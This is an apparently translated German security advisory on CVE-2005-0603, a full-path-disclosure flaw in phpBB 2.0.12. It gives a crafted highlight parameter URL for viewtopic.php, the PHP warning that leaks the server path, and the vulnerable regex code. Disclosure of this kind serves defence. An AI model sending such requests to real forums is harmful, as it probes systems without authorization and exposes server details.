
Proof-of-Concept-Exploit für CVE-2005-0603, der eine Full-Path-Disclosure-Schwachstelle in phpBB 2.0.12 über einen manipulierten Regex im Highlight-Parameter von viewtopic.php demonstriert.
Programm: phpBB 2.0.12 Homepage: http://www.phpbb.com Verwundbare Versionen: phpBB 2.0.12 und niedrigere Versionen Risiko: Geringes Risiko!! Auswirkung: Offenlegung des vollständigen Pfads
-==phpBB 2.0.12 Offenlegung des vollständigen Pfads==-
phpBB ist ein leistungsstarkes, vollständig skalierbares und hochgradig anpassbares Open-Source-Bulletin-Board-Paket. phpBB verfügt über eine benutzerfreundliche Oberfläche, ein einfaches und unkompliziertes Administrationspanel und eine hilfreiche FAQ. Basierend auf der leistungsstarken PHP-Serversprache und Ihrer Wahl an MySQL-, MS-SQL-, PostgreSQL- oder Access/ODBC-Datenbankservern ist phpBB die ideale kostenlose Community-Lösung für alle Websites.
localhost & viele Foren
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
Es wird ungefähr so ausgegeben.
Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1
Dies führt zur Offenlegung des vollständigen Pfads, und eine Sache ist mir dabei noch aufgefallen: Die Beiträge verändern sich, es kommt nichts heraus. In der HighLight-Variable.
Hier ist das Problem: -----[ Start des verwundbaren Codes ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ Ende des verwundbaren Codes ] ------------------------------------ Borgt euch nichts, lol.
Noch nicht xD
Noch nicht xD
OK, eine weitere Sache, die mir aufgefallen ist, war in der php.ini:
magic_quotes_gpc = On magic_quotes_sybase = Off
Beide müssen auf ON gestellt werden.
Entdeckt von HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
Fragen? http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
Und meine kolumbianischen Leute